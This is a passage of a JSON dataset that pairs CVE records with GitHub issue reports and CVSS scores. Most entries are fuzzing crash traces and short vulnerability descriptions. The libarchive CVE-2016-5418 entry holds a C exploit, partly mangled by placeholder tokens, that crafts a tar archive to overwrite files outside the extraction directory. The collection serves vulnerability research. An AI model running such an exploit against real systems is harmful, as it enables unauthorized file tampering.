fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG APITAG stack frames follow...)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-4552",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/5240",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/5240",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2016-05-05T15:24:19Z",
        "description": "Map Area Persistent XSS Vulnerability in mail content page,please confirm.. Steps to reproduce: Compose email content via HTML APITAG can use email sending tool or other webmail to send APITAG HTML content is below: APITAG Send the mail to roundcube mail system Log in to roundcube mail system and open the mail received Click the area near the image in the APITAG xss will be triggered The vulnerability can be triggered in APITAG The testing roundcube webmail version is APITAG is below: FILETAG The test screenshot link: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-4629",
        "Issue_Url_old": "https://github.com/openexr/openexr/issues/563",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/563",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2019-09-20T17:39:21Z",
        "description": "CVETAG and CVETAG . These appear to be issues with improper use of the APITAG code, not vulnerabilities in the APITAG code itself, and both appear to be have been addressed by Apple in the OS.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-4796",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/774",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/774",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-06T06:08:07Z",
        "description": "Heap Buffer Overflow in function color_cmyk_to_rgb of color.c. Title APITAG Heap Buffer Overflow in function color_cmyk_to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-4797",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/733",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/733",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-03-28T08:56:41Z",
        "description": "division by zero (SIGFPE) error in opj_tcd_init_tile function (line NUMBERTAG of tcd.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG jp2 Starting program: PATHTAG o image.pgm i crashes NUMBERTAG jp2 [INFO] Start to read j2k main header NUMBERTAG INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fc NUMBERTAG d in opj_tcd_init_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG APITAG fraction NUMBERTAG sizeof_block NUMBERTAG manager NUMBERTAG e4) at PATHTAG NUMBERTAG if ((((OPJ_UINT NUMBERTAG l_data_size) < (OPJ_UINT NUMBERTAG l_tilec >y1 l_tilec >y0)) { (gdb) p l_data_size NUMBERTAG gdb) bt NUMBERTAG b7fc NUMBERTAG d in opj_tcd_init_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG APITAG fraction NUMBERTAG sizeof_block NUMBERTAG manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG b in opj_tcd_init_decode_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG be in opj_j2k_read_tile_header (p_j2k NUMBERTAG p_tile_inde NUMBERTAG bfff9e NUMBERTAG p_data_size NUMBERTAG bfff9e NUMBERTAG p_tile NUMBERTAG bfff9e8c, p_tile_y NUMBERTAG bfff9e NUMBERTAG p_tile NUMBERTAG bfff9e NUMBERTAG p_tile_y NUMBERTAG bfff9e NUMBERTAG p_nb_comps NUMBERTAG bfff9e9c, p_go_on NUMBERTAG bfff9e NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of l_data_size is zero. The code ((OPJ_UINT NUMBERTAG l_data_size will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a jp2 file to generate the APITAG APITAG APITAG PATHTAG APITAG APITAG PATHTAG APITAG APITAG Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-4804",
        "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/25",
        "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/25",
        "Repo_new": "dosfstools/dosfstools",
        "Issue_Created_At": "2016-04-12T16:25:33Z",
        "description": "Heap overflow in function APITAG The attached file will cause a heap overflow in the function read_fat (it's zip packed, because github only allows certain file types). This was found via fuzzing with american fuzzy lop and address sanitizer. Address Sanitizer error message / stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG be NUMBERTAG at pc NUMBERTAG e NUMBERTAG f bp NUMBERTAG ffde1e2f3b0 sp NUMBERTAG ffde1e2eb NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG be NUMBERTAG thread T NUMBERTAG e NUMBERTAG e in __asan_memset ( PATHTAG NUMBERTAG f NUMBERTAG in read_fat PATHTAG NUMBERTAG e NUMBERTAG c in main PATHTAG NUMBERTAG f5e7c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG c NUMBERTAG be NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.2,
        "impactScore": 3.6,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2016-4804",
        "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/26",
        "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/26",
        "Repo_new": "dosfstools/dosfstools",
        "Issue_Created_At": "2016-04-13T22:34:27Z",
        "description": "heap out of bounds read in APITAG An invalid memory read (heap oob) can happen with a malformed filesystem in the function APITAG This was found with american fuzzy lop and address sanitizer. ASAN stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fdc8 at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fff NUMBERTAG e NUMBERTAG sp NUMBERTAG fff NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG fdc8 thread T NUMBERTAG f NUMBERTAG in get_fat PATHTAG NUMBERTAG f NUMBERTAG in read_fat PATHTAG NUMBERTAG e NUMBERTAG c in main PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG af in __libc_start_main APITAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG fdc8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.2,
        "impactScore": 3.6,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2016-4809",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/705",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/705",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-05-12T08:21:15Z",
        "description": "memory allocate error. hi guys. I with use afl & asan found some exceptions with memory allocate.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-4855",
        "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/274",
        "Issue_Url_new": "https://github.com/adodb/adodb/issues/274",
        "Repo_new": "adodb/adodb",
        "Issue_Created_At": "2016-08-28T22:46:16Z",
        "description": "XSS vulnerability in old test script. JPCERT Coordination Center (JPCERT/CC) URLTAG reported the following vulnerability in APITAG _As a workaround until hotfix is released, we recommend all users to remove the whole APITAG directory ; it is only used for development purposes and is not necessary for normal APITAG operations._ Report description APITAG Number] JVN NUMBERTAG APITAG APITAG vulnerable to cross site scripting APITAG Related Information] Anonymous (reporter information was not provided) APITAG Information] This vulnerability was found by the reporter Product Name: APITAG Version NUMBERTAG Language: PHP Description: Cross site scripting Reproduction Procedure: Environment used: OS: Windows NUMBERTAG Middleware: Most recent version of xampp Place the most recent version of xampp at APITAG Place APITAG at APITAG Using Chrome with the XSS filter turned off, access APITAG to reproduce the vulnerability. Here an alert dialog will appear. APITAG Impacts] Cookies may be stolen Pages may be defaced Other affects of XSS APITAG Workarounds] None APITAG of Concept Code] None APITAG Information] None APITAG Validation and Comments from IPA] None APITAG from JPCERT/CC] None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-4864",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/1077",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/1077",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2016-09-14T08:00:27Z",
        "description": "Format String Vulnerability ( CVETAG ). Format string vulnerability exists in FILETAG upto and including version FILETAG NUMBERTAG URLTAG , that can be used by remote attackers to mount Denial of Service attacks. Users using one of the following handlers of H2O may be affected by the issue and are advised to __upgrade immediately to version FILETAG or NUMBERTAG URLTAG __. Affected handlers: FILETAG FILETAG FILETAG FILETAG FILETAG Deployments only using the FILETAG is not affected by the vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-5060",
        "Issue_Url_old": "https://github.com/naver/ngrinder/issues/103",
        "Issue_Url_new": "https://github.com/naver/ngrinder/issues/103",
        "Repo_new": "naver/ngrinder",
        "Issue_Created_At": "2016-04-14T02:29:52Z",
        "description": "Fix security issue. Fix ngrinder security issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-5116",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/211",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/211",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-05-13T05:35:49Z",
        "description": "APITAG vsnprintf return value not checked leaks memory in PHP NUMBERTAG Description: See reproduction test case, length from the failed vsnprintf attempt NUMBERTAG to copy more than NUMBERTAG chars on a NUMBERTAG buffer, vsnprintf NUMBERTAG a return value of size or more means that the output was truncated\", however libgd returns this length as is and PHP prints more information from memory than it should. Libgd isn't checking the vsnprintf return value and PHP NUMBERTAG will print the length specified, leaking memory data. ERRORTAG This was reported to PHP CVETAG Compile PHP NUMBERTAG with ASAN. BP on URLTAG CODETAG NUMBERTAG URLTAG NUMBERTAG URLTAG / Test script: APITAG Actual result: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-5301",
        "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/780",
        "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/780",
        "Repo_new": "arvidn/libtorrent",
        "Issue_Created_At": "2016-06-03T13:03:49Z",
        "description": "Libtorrent crashes while parsing invalid chunked HTTP or APITAG response. libtorrent version (or branch NUMBERTAG platform/architecture: Linu NUMBERTAG compiler and compiler version: Ubuntu clang version NUMBERTAG PATHTAG ) (based on LLVM NUMBERTAG A specially crafted HTTP response from a tracker (or potentially a APITAG broadcast) can crash libtorrent in the APITAG function. This bug was found with AFL. Let me know if you need any more information or cannot reproduce. Base NUMBERTAG encoded HTTP response that should crash libtorrent: CODETAG APITAG output: ERRORTAG Valgrind output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-5418",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/746",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/746",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-07-21T03:42:34Z",
        "description": "Hard links with data can evade sandboxing restrictions. This is the last of four libarchive bugs reported in Issue NUMBERTAG APITAG NUMBERTAG APITAG HEAD/ports NUMBERTAG APITAG non HEAD), possibly earlier APITAG Recall the three classes of filesystem attacks listed earlier NUMBERTAG absolute paths NUMBERTAG dot dot paths NUMBERTAG extraction through symlinks These checks are applied as usual to the pathnames of symlinks and hard links but not to their targets, with one exception: The targets of hard links are subjected to absolute path checks in tar/util.c as of APITAG revision r NUMBERTAG and upstream commit cf8e NUMBERTAG f (it seems the revision was submitted upstream and was rewritten in a different form as the commit both strip leading slashes from the hard link targets, though not for security reasons). Archive entries for hard links can use dot dot pathnames in their targets to point at any file on the system, subject to the usual hard linking constraints. Alternatively, on systems that follow symlinks for APITAG which is an implementation defined behavior supported by APITAG a symlink can first be extracted that uses absolute or dot dot pathnames to point at the file, and then the hard link target can be the symlink, which means that filtering the hard link target for dot dot paths is not sufficient to address the problem. The ability to point hard links at outside files becomes more serious when we consider that libarchive supports the POSIX feature of hard links with data payloads. This allows an attacker to point a hard link at an existing target file outside the extraction directory and use the data payload to overwrite the file. APITAG Exploit code is included below. $ cd /tmp/cage $ ls vuln4.c $ cc o vuln4 vuln4.c larchive $ echo hello > /tmp/target $ echo goodbye > data $ ./vuln4 x.tar data p PATHTAG $ tar tvf x.tar rwxrwxrw NUMBERTAG Jan NUMBERTAG p link to PATHTAG $ tar xvf x.tar x p $ cat /tmp/target goodbye The code could be rewritten to use symlinks instead of dot dot paths: $ cd /tmp/cage $ ls vuln4 vuln4.c $ echo hello > /tmp/target $ echo goodbye > data $ ln s /tmp/target sym $ ./vuln4 x.tar data p sym $ tar tvf x.tar rwxrwxrw NUMBERTAG Jan NUMBERTAG p link to sym $ tar xvf x.tar x p $ cat /tmp/target goodbye APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG static void make_archive(char , char , char , char ); static void patch_archive(char , char ); static void make_archive(char archive, char file, char pathname, char linkname) { int fd; ssize_t len; char buf NUMBERTAG struct stat s; struct archive a; struct archive_entry ae; a = APITAG APITAG APITAG archive); ae = APITAG APITAG pathname); / dummy file type AE_SET_HARDLINK has priority anyway / APITAG AE_IFREG); stat(file, &s); archive_entry_set_size(ae, s.st_size); archive_entry_set_uid(ae NUMBERTAG archive_entry_set_gid(ae NUMBERTAG archive_entry_set_perm(ae NUMBERTAG libarchive allows _extraction_ of hardlink payloads, as per the POSIX specs for pax, but not without some arm twisting. We set ctime to force the addition of a pax extended header so that libarchive doesn't zero the size field during _extraction_. libarchive disallows _creation_ of hardlink payloads for all supported tar formats (pax, ustar, gnutar NUMBERTAG tar). If we set the hardlink, libarchive will zero the size field during _creation_, so we simply create a regular file entry and patch the archive on disk via APITAG when done. / archive_entry_set_ctime(ae NUMBERTAG APITAG linkname); / archive_write_header(a, ae); fd = open(file, O_RDONLY); while ((len = read(fd, buf, sizeof buf NUMBERTAG archive_write_data(a, buf, (size_t)len); close(fd); archive_entry_free(ae); archive_write_close(a); archive_write_free(a); patch_archive(archive, linkname); } static void patch_archive(char archive, char linkname) { / extended header + extended body + checksum offset / static const long patch_offset NUMBERTAG FILE fp; unsigned char cp; unsigned long checksum; fp = fopen(archive, \"r+b\"); fseek(fp, patch_offset, SEEK_SET); fscanf(fp, \"%lo\", &checksum); / entry type NUMBERTAG checksum NUMBERTAG cp = (unsigned char )linkname; / linkname char NUMBERTAG while ( cp) checksum += cp++; fseek(fp, patch_offset, SEEK_SET); fprintf(fp NUMBERTAG lo%c NUMBERTAG s\", checksum NUMBERTAG linkname); fclose(fp); } int main(int argc, char APITAG { if (argc NUMBERTAG fprintf(stderr, APITAG %s archive file pathname linkname \", arg NUMBERTAG fprintf(stderr, \" archive output malicious archive here \"); fprintf(stderr, \" file file containing overwrite data \"); fprintf(stderr, \" pathname archive entry pathname \"); fprintf(stderr, \" linkname archive entry linkname \"); fprintf(stderr, \" [can use ../ in linkname] \"); return EXIT_FAILURE; } make_archive(arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG return NUMBERTAG APITAG APITAG POSIX requires that hard links point at only extracted items, though the possibility that a hard link can use a previously extracted symlink as a target and escape the extraction directory should be borne in mind. It seems a good idea to excise the data payload functionality, which is not a mandatory POSIX feature and which does not seem to be widely supported anyway. Look for the lines beginning } else if (r NUMBERTAG a >filesize NUMBERTAG in APITAG in APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-5727",
        "Issue_Url_old": "https://github.com/SimpleMachines/SMF2.1/issues/3522",
        "Issue_Url_new": "https://github.com/simplemachines/smf/issues/3522",
        "Repo_new": "simplemachines/smf",
        "Issue_Created_At": "2016-07-12T15:01:28Z",
        "description": "Fix CVETAG PHP Object Injection Vulnerability. MENTIONTAG can you verify whether or not this was fixed with this commit: URLTAG per URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-5824",
        "Issue_Url_old": "https://github.com/libical/libical/issues/286",
        "Issue_Url_new": "https://github.com/libical/libical/issues/286",
        "Repo_new": "libical/libical",
        "Issue_Created_At": "2017-01-20T11:39:03Z",
        "description": "CVETAG : use after free issues. MENTIONTAG has been fuzzing libical last year and found some issues, he reported them first in NUMBERTAG but closed the ticket when he opened the same ticket against thunderbird in the hope to get more answers: CVETAG Also lacking any positive answer there, he published all his fuzzing results here: URLTAG At this point it's not clear whether those issues have been fixed in libical and if they have, it would be nice to know which commit fixed them. This is the point of this ticket. A CVE number has been assigned to those issues: URLTAG (CVE assignment here: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-5824",
        "Issue_Url_old": "https://github.com/libical/libical/issues/251",
        "Issue_Url_new": "https://github.com/libical/libical/issues/251",
        "Repo_new": "libical/libical",
        "Issue_Created_At": "2016-12-02T14:33:52Z",
        "description": "A heap buffer overflow in icaltime_from_string. Hello, we recently found a memmory issue parsing and executing fuzzed ical file in last revision of libical ( APITAG We tested this issue on Ubuntu NUMBERTAG but other configurations could be affected. Technical details about the issue are: ERRORTAG gdb backtrace is as follows: ERRORTAG This issue was found using APITAG the file to reproduce it is FILETAG . Regards.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-5824",
        "Issue_Url_old": "https://github.com/libical/libical/issues/235",
        "Issue_Url_new": "https://github.com/libical/libical/issues/235",
        "Repo_new": "libical/libical",
        "Issue_Created_At": "2016-05-22T19:42:45Z",
        "description": "Potentially security sensitive crashes, best way to get them to you?. Hello, I have been fuzzing libical for a while, I have a handful of use after frees (might be all the same root bug) I would like to provide, but these are potentially security sensitive and not appropriate for a github comment. An example asan trace (tested against NUMBERTAG and master from NUMBERTAG minutes ago): ERRORTAG What's the best way to get the test cases to reproduce the issues to you? My email is bperry. EMAILTAG if you would like to hit me up directly at your convenience.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-5844",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/717",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/717",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-06-18T09:18:16Z",
        "description": "signed integer overflow in iso parser. The attached malformed iso file (packed as zip, because github limits attachment file types) will cause a signed integer overflow when passed to \"bsdtar tf FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-6132",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/247",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/247",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-06-30T13:33:42Z",
        "description": "A read out of bands was found in the parsing of TGA files. Hi, A read out of bands was found in the parsing of TGA files using the last revision of libgd APITAG Find FILETAG to reproduce it. The ASAN report is here: ERRORTAG (it is not related with bug NUMBERTAG i just re used the test case to read an arbitrary TGA file) This issue was found using APITAG Regards, Gustavo.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-6136",
        "Issue_Url_old": "https://github.com/linux-audit/audit-kernel/issues/18",
        "Issue_Url_new": "https://github.com/linux-audit/audit-kernel/issues/18",
        "Repo_new": "linux-audit/audit-kernel",
        "Issue_Created_At": "2016-06-27T21:44:05Z",
        "description": "BUG: fix double fetch in APITAG See the mailing list thread below for information: FILETAG Taken from the original report: > In function APITAG the whole argument is fetched from user space twice via APITAG In the first loop, it is firstly fetched (line NUMBERTAG to verify, aka looking for non ascii chars. While in the second loop, the whole argument is fetched again (line NUMBERTAG from user space and used at line NUMBERTAG and line NUMBERTAG respectively depends on the previous verification.",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2016-6160",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/251",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/251",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2016-07-06T15:52:58Z",
        "description": "Seg Fault on illegal frame size NUMBERTAG From CVETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-6161",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/209",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/209",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-05-08T12:06:28Z",
        "description": "global out of bounds read when encoding gif from malformed input with gd2togif. The attached file causes a global out of bounds read error in the function output (gd_gif_out.c), called by APITAG This was found with the help of american fuzzy lop and address sanitizer. To test pass the attached file (zip packed due to github limitations) to gd2togif compiled with address sanitizer. The full address sanitizer error message NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG e4b0 at pc NUMBERTAG bp NUMBERTAG ffc8a6e NUMBERTAG sp NUMBERTAG ffc8a6e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e4b0 thread T NUMBERTAG in output PATHTAG NUMBERTAG fb4a in compress PATHTAG NUMBERTAG b NUMBERTAG a in APITAG PATHTAG NUMBERTAG b NUMBERTAG a in APITAG PATHTAG NUMBERTAG bb NUMBERTAG in APITAG PATHTAG NUMBERTAG f3cc6 in main PATHTAG NUMBERTAG f2ab NUMBERTAG b NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG fa8 in _start ( PATHTAG NUMBERTAG e4b0 is located NUMBERTAG bytes to the left of global variable 'masks' defined in APITAG NUMBERTAG e4c0) of size NUMBERTAG e4b0 is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in APITAG NUMBERTAG e NUMBERTAG of size NUMBERTAG string literal>' is ascii string 'GIF NUMBERTAG a' SUMMARY: APITAG global buffer overflow PATHTAG in output Shadow bytes around the buggy address NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-6172",
        "Issue_Url_old": "https://github.com/PowerDNS/pdns/issues/4128",
        "Issue_Url_new": "https://github.com/powerdns/pdns/issues/4128",
        "Repo_new": "powerdns/pdns",
        "Issue_Created_At": "2016-07-07T07:17:16Z",
        "description": "xfer size issue. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H",
        "severity": "MEDIUM",
